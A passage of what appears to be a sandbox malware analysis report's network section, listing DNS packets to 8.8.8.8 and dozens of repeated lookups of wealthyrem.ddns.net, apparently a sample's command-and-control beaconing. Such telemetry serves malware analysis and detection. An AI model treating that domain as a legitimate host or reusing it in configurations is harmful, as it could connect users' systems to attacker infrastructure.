              Aug 3, 2021 18:03:16.298263073 CEST6368453192.168.2.78.8.8.8
              Aug 3, 2021 18:03:16.334412098 CEST53636848.8.8.8192.168.2.7
              Aug 3, 2021 18:03:18.577682018 CEST6291253192.168.2.78.8.8.8
              Aug 3, 2021 18:03:18.609951973 CEST53629128.8.8.8192.168.2.7
              Aug 3, 2021 18:03:20.823909998 CEST6080453192.168.2.78.8.8.8
              Aug 3, 2021 18:03:20.857263088 CEST53608048.8.8.8192.168.2.7
              Aug 3, 2021 18:03:23.382271051 CEST6013953192.168.2.78.8.8.8
              Aug 3, 2021 18:03:23.414494038 CEST53601398.8.8.8192.168.2.7
              Aug 3, 2021 18:03:25.568608999 CEST5914053192.168.2.78.8.8.8
              Aug 3, 2021 18:03:25.596151114 CEST53591408.8.8.8192.168.2.7
              Aug 3, 2021 18:03:27.786000013 CEST5090553192.168.2.78.8.8.8
              Aug 3, 2021 18:03:27.820512056 CEST53509058.8.8.8192.168.2.7
              Aug 3, 2021 18:03:29.970823050 CEST5338153192.168.2.78.8.8.8
              Aug 3, 2021 18:03:30.006797075 CEST53533818.8.8.8192.168.2.7
              Aug 3, 2021 18:03:32.280169010 CEST5439053192.168.2.78.8.8.8
              Aug 3, 2021 18:03:32.305104971 CEST53543908.8.8.8192.168.2.7
              Aug 3, 2021 18:03:34.624697924 CEST6351453192.168.2.78.8.8.8
              Aug 3, 2021 18:03:34.674105883 CEST53635148.8.8.8192.168.2.7
              Aug 3, 2021 18:03:36.843624115 CEST5057853192.168.2.78.8.8.8
              Aug 3, 2021 18:03:36.870151043 CEST53505788.8.8.8192.168.2.7
              Aug 3, 2021 18:03:39.766789913 CEST6355453192.168.2.78.8.8.8
              Aug 3, 2021 18:03:39.802304029 CEST53635548.8.8.8192.168.2.7
              Aug 3, 2021 18:03:42.572490931 CEST6387853192.168.2.78.8.8.8
              Aug 3, 2021 18:03:42.600116968 CEST53638788.8.8.8192.168.2.7
              Aug 3, 2021 18:03:44.770999908 CEST5379253192.168.2.78.8.8.8
              Aug 3, 2021 18:03:44.808240891 CEST53537928.8.8.8192.168.2.7
              Aug 3, 2021 18:03:46.998238087 CEST6528053192.168.2.78.8.8.8
              Aug 3, 2021 18:03:47.031979084 CEST53652808.8.8.8192.168.2.7
              Aug 3, 2021 18:03:49.284440041 CEST5589053192.168.2.78.8.8.8
              Aug 3, 2021 18:03:49.317770004 CEST53558908.8.8.8192.168.2.7
              Aug 3, 2021 18:03:51.488023996 CEST5708253192.168.2.78.8.8.8
              Aug 3, 2021 18:03:51.520335913 CEST53570828.8.8.8192.168.2.7
              Aug 3, 2021 18:03:53.693032026 CEST6432853192.168.2.78.8.8.8
              Aug 3, 2021 18:03:53.726793051 CEST53643288.8.8.8192.168.2.7
              Aug 3, 2021 18:03:55.907618999 CEST5440053192.168.2.78.8.8.8
              Aug 3, 2021 18:03:55.942558050 CEST53544008.8.8.8192.168.2.7
              Aug 3, 2021 18:03:58.144536972 CEST5251453192.168.2.78.8.8.8
              Aug 3, 2021 18:03:58.180290937 CEST53525148.8.8.8192.168.2.7
              Aug 3, 2021 18:04:00.352569103 CEST5310453192.168.2.78.8.8.8
              Aug 3, 2021 18:04:00.387912989 CEST53531048.8.8.8192.168.2.7
              Aug 3, 2021 18:04:02.567497015 CEST5436753192.168.2.78.8.8.8
              Aug 3, 2021 18:04:02.602576017 CEST53543678.8.8.8192.168.2.7
              Aug 3, 2021 18:04:04.826550007 CEST6420253192.168.2.78.8.8.8
              Aug 3, 2021 18:04:04.860369921 CEST53642028.8.8.8192.168.2.7
              Aug 3, 2021 18:04:07.021646976 CEST6217153192.168.2.78.8.8.8
              Aug 3, 2021 18:04:07.058125019 CEST53621718.8.8.8192.168.2.7
              Aug 3, 2021 18:04:09.210397959 CEST5067253192.168.2.78.8.8.8
              Aug 3, 2021 18:04:09.243210077 CEST53506728.8.8.8192.168.2.7
              Aug 3, 2021 18:04:11.397119045 CEST6356553192.168.2.78.8.8.8
              Aug 3, 2021 18:04:11.430680037 CEST53635658.8.8.8192.168.2.7
              Aug 3, 2021 18:04:13.742794991 CEST6212153192.168.2.78.8.8.8
              Aug 3, 2021 18:04:13.775387049 CEST53621218.8.8.8192.168.2.7
              Aug 3, 2021 18:04:16.432327032 CEST5933053192.168.2.78.8.8.8
              Aug 3, 2021 18:04:16.467454910 CEST53593308.8.8.8192.168.2.7
              Aug 3, 2021 18:04:18.622884989 CEST5137853192.168.2.78.8.8.8
              Aug 3, 2021 18:04:18.651566029 CEST53513788.8.8.8192.168.2.7
              Aug 3, 2021 18:04:20.852276087 CEST5841853192.168.2.78.8.8.8
              Aug 3, 2021 18:04:20.887847900 CEST53584188.8.8.8192.168.2.7
              Aug 3, 2021 18:04:23.043164968 CEST6321153192.168.2.78.8.8.8
              Aug 3, 2021 18:04:23.075534105 CEST53632118.8.8.8192.168.2.7
              Aug 3, 2021 18:04:25.248914957 CEST5751553192.168.2.78.8.8.8
              Aug 3, 2021 18:04:25.284774065 CEST53575158.8.8.8192.168.2.7
              Aug 3, 2021 18:04:27.449661016 CEST5638153192.168.2.78.8.8.8
              Aug 3, 2021 18:04:27.485532999 CEST53563818.8.8.8192.168.2.7
              Aug 3, 2021 18:04:29.668241978 CEST5836753192.168.2.78.8.8.8
              Aug 3, 2021 18:04:29.703403950 CEST53583678.8.8.8192.168.2.7
              Aug 3, 2021 18:04:31.869529963 CEST5609653192.168.2.78.8.8.8
              Aug 3, 2021 18:04:31.897357941 CEST53560968.8.8.8192.168.2.7
              Aug 3, 2021 18:04:34.244858027 CEST6004453192.168.2.78.8.8.8
              Aug 3, 2021 18:04:34.277890921 CEST53600448.8.8.8192.168.2.7
              Aug 3, 2021 18:04:36.483568907 CEST6177553192.168.2.78.8.8.8
              Aug 3, 2021 18:04:36.511339903 CEST53617758.8.8.8192.168.2.7
              Aug 3, 2021 18:04:38.694935083 CEST5081353192.168.2.78.8.8.8
              Aug 3, 2021 18:04:38.731224060 CEST53508138.8.8.8192.168.2.7
              Aug 3, 2021 18:04:40.927027941 CEST6517353192.168.2.78.8.8.8
              Aug 3, 2021 18:04:40.959721088 CEST53651738.8.8.8192.168.2.7
              Aug 3, 2021 18:04:43.148438931 CEST5130753192.168.2.78.8.8.8
              Aug 3, 2021 18:04:43.182590008 CEST53513078.8.8.8192.168.2.7
              Aug 3, 2021 18:04:45.355446100 CEST5124853192.168.2.78.8.8.8
              Aug 3, 2021 18:04:45.390722990 CEST53512488.8.8.8192.168.2.7
              Aug 3, 2021 18:04:47.541191101 CEST5047653192.168.2.78.8.8.8
              Aug 3, 2021 18:04:47.577378988 CEST53504768.8.8.8192.168.2.7
              Aug 3, 2021 18:04:49.799333096 CEST6316853192.168.2.78.8.8.8
              Aug 3, 2021 18:04:49.836647987 CEST53631688.8.8.8192.168.2.7
              Aug 3, 2021 18:04:53.196739912 CEST6299353192.168.2.78.8.8.8
              Aug 3, 2021 18:04:53.229334116 CEST53629938.8.8.8192.168.2.7
              Aug 3, 2021 18:04:55.389027119 CEST5645253192.168.2.78.8.8.8
              Aug 3, 2021 18:04:55.424460888 CEST53564528.8.8.8192.168.2.7
              Aug 3, 2021 18:04:57.591773987 CEST5454753192.168.2.78.8.8.8
              Aug 3, 2021 18:04:57.624083042 CEST53545478.8.8.8192.168.2.7
              Aug 3, 2021 18:04:59.795327902 CEST4988653192.168.2.78.8.8.8
              Aug 3, 2021 18:04:59.828027010 CEST53498868.8.8.8192.168.2.7
              Aug 3, 2021 18:05:01.986629009 CEST5664753192.168.2.78.8.8.8
              Aug 3, 2021 18:05:02.019203901 CEST53566478.8.8.8192.168.2.7
              Aug 3, 2021 18:05:04.179060936 CEST5884553192.168.2.78.8.8.8
              Aug 3, 2021 18:05:04.214956045 CEST53588458.8.8.8192.168.2.7
              Aug 3, 2021 18:05:06.370069027 CEST5981553192.168.2.78.8.8.8
              Aug 3, 2021 18:05:06.404021978 CEST53598158.8.8.8192.168.2.7
              Aug 3, 2021 18:05:08.592544079 CEST5984753192.168.2.78.8.8.8
              Aug 3, 2021 18:05:08.625143051 CEST53598478.8.8.8192.168.2.7
              Aug 3, 2021 18:05:11.766412020 CEST5774953192.168.2.78.8.8.8
              Aug 3, 2021 18:05:11.801686049 CEST53577498.8.8.8192.168.2.7
              Aug 3, 2021 18:05:13.996082067 CEST6455453192.168.2.78.8.8.8
              Aug 3, 2021 18:05:14.028672934 CEST53645548.8.8.8192.168.2.7
              Aug 3, 2021 18:05:16.184967995 CEST6114353192.168.2.78.8.8.8
              Aug 3, 2021 18:05:16.217849970 CEST53611438.8.8.8192.168.2.7
              Aug 3, 2021 18:05:18.386063099 CEST6084253192.168.2.78.8.8.8
              Aug 3, 2021 18:05:18.415306091 CEST53608428.8.8.8192.168.2.7
              Aug 3, 2021 18:05:20.575215101 CEST5477953192.168.2.78.8.8.8
              Aug 3, 2021 18:05:20.610532999 CEST53547798.8.8.8192.168.2.7
              Aug 3, 2021 18:05:22.764461040 CEST5979453192.168.2.78.8.8.8
              Aug 3, 2021 18:05:22.797117949 CEST53597948.8.8.8192.168.2.7
              Aug 3, 2021 18:05:25.003761053 CEST5135753192.168.2.78.8.8.8
              Aug 3, 2021 18:05:25.036484957 CEST53513578.8.8.8192.168.2.7
              Aug 3, 2021 18:05:27.221846104 CEST5120853192.168.2.78.8.8.8
              Aug 3, 2021 18:05:27.255598068 CEST53512088.8.8.8192.168.2.7
              Aug 3, 2021 18:05:30.703397036 CEST5117453192.168.2.78.8.8.8
              Aug 3, 2021 18:05:30.754188061 CEST53511748.8.8.8192.168.2.7
              Aug 3, 2021 18:05:33.031140089 CEST5994553192.168.2.78.8.8.8
              Aug 3, 2021 18:05:33.063888073 CEST53599458.8.8.8192.168.2.7
              Aug 3, 2021 18:05:35.231430054 CEST6504153192.168.2.78.8.8.8
              Aug 3, 2021 18:05:35.264806032 CEST53650418.8.8.8192.168.2.7
              Aug 3, 2021 18:05:37.450562000 CEST5730053192.168.2.78.8.8.8
              Aug 3, 2021 18:05:37.485719919 CEST53573008.8.8.8192.168.2.7
              Aug 3, 2021 18:05:39.653464079 CEST5270253192.168.2.78.8.8.8
              Aug 3, 2021 18:05:39.687992096 CEST53527028.8.8.8192.168.2.7
              Aug 3, 2021 18:05:41.900424957 CEST6229253192.168.2.78.8.8.8
              Aug 3, 2021 18:05:41.925355911 CEST53622928.8.8.8192.168.2.7
              Aug 3, 2021 18:05:44.099422932 CEST5745353192.168.2.78.8.8.8
              Aug 3, 2021 18:05:44.133326054 CEST53574538.8.8.8192.168.2.7
              Aug 3, 2021 18:05:46.318114996 CEST5013153192.168.2.78.8.8.8
              Aug 3, 2021 18:05:46.355571032 CEST53501318.8.8.8192.168.2.7
              Aug 3, 2021 18:05:49.050117970 CEST5245853192.168.2.78.8.8.8
              Aug 3, 2021 18:05:49.114978075 CEST53524588.8.8.8192.168.2.7
              Aug 3, 2021 18:05:51.279237032 CEST5552753192.168.2.78.8.8.8
              Aug 3, 2021 18:05:51.315931082 CEST53555278.8.8.8192.168.2.7
              Aug 3, 2021 18:05:53.496871948 CEST6346553192.168.2.78.8.8.8
              Aug 3, 2021 18:05:53.529486895 CEST53634658.8.8.8192.168.2.7
              Aug 3, 2021 18:05:55.702008009 CEST6355853192.168.2.78.8.8.8
              Aug 3, 2021 18:05:55.736372948 CEST53635588.8.8.8192.168.2.7
              Aug 3, 2021 18:05:57.925591946 CEST5319253192.168.2.78.8.8.8
              Aug 3, 2021 18:05:57.963054895 CEST53531928.8.8.8192.168.2.7
              Aug 3, 2021 18:06:00.129034042 CEST5936053192.168.2.78.8.8.8
              Aug 3, 2021 18:06:00.164889097 CEST53593608.8.8.8192.168.2.7
              Aug 3, 2021 18:06:02.342406988 CEST6174253192.168.2.78.8.8.8
              Aug 3, 2021 18:06:02.375046968 CEST53617428.8.8.8192.168.2.7
              Aug 3, 2021 18:06:04.561638117 CEST6520953192.168.2.78.8.8.8
              Aug 3, 2021 18:06:04.589843035 CEST53652098.8.8.8192.168.2.7
              Aug 3, 2021 18:06:06.782063007 CEST6372753192.168.2.78.8.8.8
              Aug 3, 2021 18:06:06.815399885 CEST53637278.8.8.8192.168.2.7
              Aug 3, 2021 18:06:08.985441923 CEST5841053192.168.2.78.8.8.8
              Aug 3, 2021 18:06:09.012912989 CEST53584108.8.8.8192.168.2.7
              Aug 3, 2021 18:06:09.822419882 CEST6469253192.168.2.78.8.8.8
              Aug 3, 2021 18:06:09.855053902 CEST53646928.8.8.8192.168.2.7
              Aug 3, 2021 18:06:11.207012892 CEST5670653192.168.2.78.8.8.8
              Aug 3, 2021 18:06:11.242706060 CEST53567068.8.8.8192.168.2.7
              Aug 3, 2021 18:06:13.475601912 CEST5729253192.168.2.78.8.8.8
              Aug 3, 2021 18:06:13.507868052 CEST53572928.8.8.8192.168.2.7
              Aug 3, 2021 18:06:15.661334038 CEST5952353192.168.2.78.8.8.8
              Aug 3, 2021 18:06:15.697130919 CEST53595238.8.8.8192.168.2.7
              Aug 3, 2021 18:06:17.860109091 CEST6389653192.168.2.78.8.8.8
              Aug 3, 2021 18:06:17.896765947 CEST53638968.8.8.8192.168.2.7
              Aug 3, 2021 18:06:20.232481003 CEST6354253192.168.2.78.8.8.8
              Aug 3, 2021 18:06:20.259336948 CEST53635428.8.8.8192.168.2.7
              Aug 3, 2021 18:06:22.489272118 CEST6366953192.168.2.78.8.8.8
              Aug 3, 2021 18:06:22.522475958 CEST53636698.8.8.8192.168.2.7
              Aug 3, 2021 18:06:24.708709002 CEST6086953192.168.2.78.8.8.8
              Aug 3, 2021 18:06:24.743968964 CEST53608698.8.8.8192.168.2.7
              Aug 3, 2021 18:06:26.908519983 CEST5533053192.168.2.78.8.8.8
              Aug 3, 2021 18:06:26.943700075 CEST53553308.8.8.8192.168.2.7
              Aug 3, 2021 18:06:29.123908043 CEST6209553192.168.2.78.8.8.8
              Aug 3, 2021 18:06:29.156662941 CEST53620958.8.8.8192.168.2.7
              Aug 3, 2021 18:06:31.318967104 CEST5142553192.168.2.78.8.8.8
              Aug 3, 2021 18:06:31.352756023 CEST53514258.8.8.8192.168.2.7
              Aug 3, 2021 18:06:33.526235104 CEST5390853192.168.2.78.8.8.8
              Aug 3, 2021 18:06:33.561729908 CEST53539088.8.8.8192.168.2.7
              Aug 3, 2021 18:06:35.725197077 CEST5969253192.168.2.78.8.8.8
              Aug 3, 2021 18:06:35.760827065 CEST53596928.8.8.8192.168.2.7
              Aug 3, 2021 18:06:37.910315990 CEST5926853192.168.2.78.8.8.8
              Aug 3, 2021 18:06:37.989125013 CEST53592688.8.8.8192.168.2.7
              Aug 3, 2021 18:06:41.046650887 CEST5510953192.168.2.78.8.8.8
              Aug 3, 2021 18:06:41.071511984 CEST53551098.8.8.8192.168.2.7
              Aug 3, 2021 18:06:43.236715078 CEST5697353192.168.2.78.8.8.8
              Aug 3, 2021 18:06:43.277365923 CEST53569738.8.8.8192.168.2.7
              Aug 3, 2021 18:06:45.437988043 CEST5732453192.168.2.78.8.8.8
              Aug 3, 2021 18:06:45.470468044 CEST53573248.8.8.8192.168.2.7
              Aug 3, 2021 18:06:47.642828941 CEST4970653192.168.2.78.8.8.8
              Aug 3, 2021 18:06:47.667928934 CEST53497068.8.8.8192.168.2.7
              Aug 3, 2021 18:06:49.829391956 CEST4924353192.168.2.78.8.8.8
              Aug 3, 2021 18:06:49.857407093 CEST53492438.8.8.8192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Aug 3, 2021 17:58:16.579519987 CEST192.168.2.78.8.8.80x6f82Standard query (0)clientconfig.passport.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:00:40.725461960 CEST192.168.2.78.8.8.80x738dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:00:42.953814983 CEST192.168.2.78.8.8.80x90c7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:00:45.163568974 CEST192.168.2.78.8.8.80x56c0Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:00:47.377684116 CEST192.168.2.78.8.8.80x99eeStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:00:49.570652962 CEST192.168.2.78.8.8.80x7ab2Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:00:51.785244942 CEST192.168.2.78.8.8.80x31cdStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:00:53.982469082 CEST192.168.2.78.8.8.80xdaf9Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:00:56.242800951 CEST192.168.2.78.8.8.80x350Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:00:58.458664894 CEST192.168.2.78.8.8.80xcfcaStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:00.649725914 CEST192.168.2.78.8.8.80xae34Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:02.853516102 CEST192.168.2.78.8.8.80xf50eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:05.072191954 CEST192.168.2.78.8.8.80x8ff2Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:07.272125006 CEST192.168.2.78.8.8.80xe6a3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:09.504134893 CEST192.168.2.78.8.8.80x2701Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:11.823220015 CEST192.168.2.78.8.8.80xf0b5Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:15.024833918 CEST192.168.2.78.8.8.80x3e9eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:17.233573914 CEST192.168.2.78.8.8.80x3d9eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:19.463181973 CEST192.168.2.78.8.8.80x3138Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:21.663360119 CEST192.168.2.78.8.8.80xc0beStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:23.853765965 CEST192.168.2.78.8.8.80xed2cStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:26.038454056 CEST192.168.2.78.8.8.80xa6abStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:28.311839104 CEST192.168.2.78.8.8.80xe72Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:30.514034033 CEST192.168.2.78.8.8.80x73Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:32.702085018 CEST192.168.2.78.8.8.80x4deeStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:34.914820910 CEST192.168.2.78.8.8.80x125Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:37.102677107 CEST192.168.2.78.8.8.80x3b76Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:39.300961018 CEST192.168.2.78.8.8.80xe6e0Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:41.516207933 CEST192.168.2.78.8.8.80x14edStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:43.755731106 CEST192.168.2.78.8.8.80x53a1Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:45.963052034 CEST192.168.2.78.8.8.80xd0bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:48.162206888 CEST192.168.2.78.8.8.80xd981Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:50.369716883 CEST192.168.2.78.8.8.80xe3acStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:52.571094990 CEST192.168.2.78.8.8.80x8a7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:54.775854111 CEST192.168.2.78.8.8.80x2605Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:56.963598967 CEST192.168.2.78.8.8.80x87f4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:01:59.232003927 CEST192.168.2.78.8.8.80xb27aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:01.442179918 CEST192.168.2.78.8.8.80x5296Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:03.636559010 CEST192.168.2.78.8.8.80xac70Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:06.978085995 CEST192.168.2.78.8.8.80xb39fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:09.167769909 CEST192.168.2.78.8.8.80x6b0fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:11.370918036 CEST192.168.2.78.8.8.80x1c7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:13.576644897 CEST192.168.2.78.8.8.80xc54bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:15.953099012 CEST192.168.2.78.8.8.80xcd0bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:18.953138113 CEST192.168.2.78.8.8.80xf049Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:21.142889023 CEST192.168.2.78.8.8.80x3892Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:23.342089891 CEST192.168.2.78.8.8.80x991Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:25.529216051 CEST192.168.2.78.8.8.80x25efStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:27.731426954 CEST192.168.2.78.8.8.80xdaabStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:29.919620037 CEST192.168.2.78.8.8.80x9f46Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:32.171211004 CEST192.168.2.78.8.8.80x5b39Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:34.362713099 CEST192.168.2.78.8.8.80x3531Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:36.564641953 CEST192.168.2.78.8.8.80xb7a6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:38.778537035 CEST192.168.2.78.8.8.80x42e2Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:40.987184048 CEST192.168.2.78.8.8.80x20bfStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:43.195158958 CEST192.168.2.78.8.8.80x27d7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:45.389694929 CEST192.168.2.78.8.8.80x58b6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:47.632599115 CEST192.168.2.78.8.8.80x5cc6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:49.815867901 CEST192.168.2.78.8.8.80xe02bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:52.019388914 CEST192.168.2.78.8.8.80x186dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:54.202487946 CEST192.168.2.78.8.8.80x2186Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:56.397581100 CEST192.168.2.78.8.8.80x2323Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:02:58.597013950 CEST192.168.2.78.8.8.80xd3f6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:00.781600952 CEST192.168.2.78.8.8.80x4b6dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:03.056288958 CEST192.168.2.78.8.8.80x4c22Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:05.250902891 CEST192.168.2.78.8.8.80xd143Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:07.470375061 CEST192.168.2.78.8.8.80x9af0Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:09.669513941 CEST192.168.2.78.8.8.80xaf82Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:11.892159939 CEST192.168.2.78.8.8.80x7d29Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:14.111555099 CEST192.168.2.78.8.8.80x9932Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:16.298263073 CEST192.168.2.78.8.8.80xde69Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:18.577682018 CEST192.168.2.78.8.8.80x2e68Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:20.823909998 CEST192.168.2.78.8.8.80x798bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:23.382271051 CEST192.168.2.78.8.8.80x8e2fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:25.568608999 CEST192.168.2.78.8.8.80x4611Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:27.786000013 CEST192.168.2.78.8.8.80xa107Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:29.970823050 CEST192.168.2.78.8.8.80xcfe7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:32.280169010 CEST192.168.2.78.8.8.80x8b08Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:34.624697924 CEST192.168.2.78.8.8.80x8116Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:36.843624115 CEST192.168.2.78.8.8.80xd602Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:39.766789913 CEST192.168.2.78.8.8.80x16aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:42.572490931 CEST192.168.2.78.8.8.80x92fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:44.770999908 CEST192.168.2.78.8.8.80x88a6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:46.998238087 CEST192.168.2.78.8.8.80xa4e6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:49.284440041 CEST192.168.2.78.8.8.80xdf82Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:51.488023996 CEST192.168.2.78.8.8.80xff63Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:53.693032026 CEST192.168.2.78.8.8.80xa21cStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:55.907618999 CEST192.168.2.78.8.8.80x8a7eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:03:58.144536972 CEST192.168.2.78.8.8.80x5e20Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:00.352569103 CEST192.168.2.78.8.8.80x4f3bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:02.567497015 CEST192.168.2.78.8.8.80xa9e6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:04.826550007 CEST192.168.2.78.8.8.80x8f00Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:07.021646976 CEST192.168.2.78.8.8.80xf3e7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:09.210397959 CEST192.168.2.78.8.8.80xb88cStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:11.397119045 CEST192.168.2.78.8.8.80xd8f3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
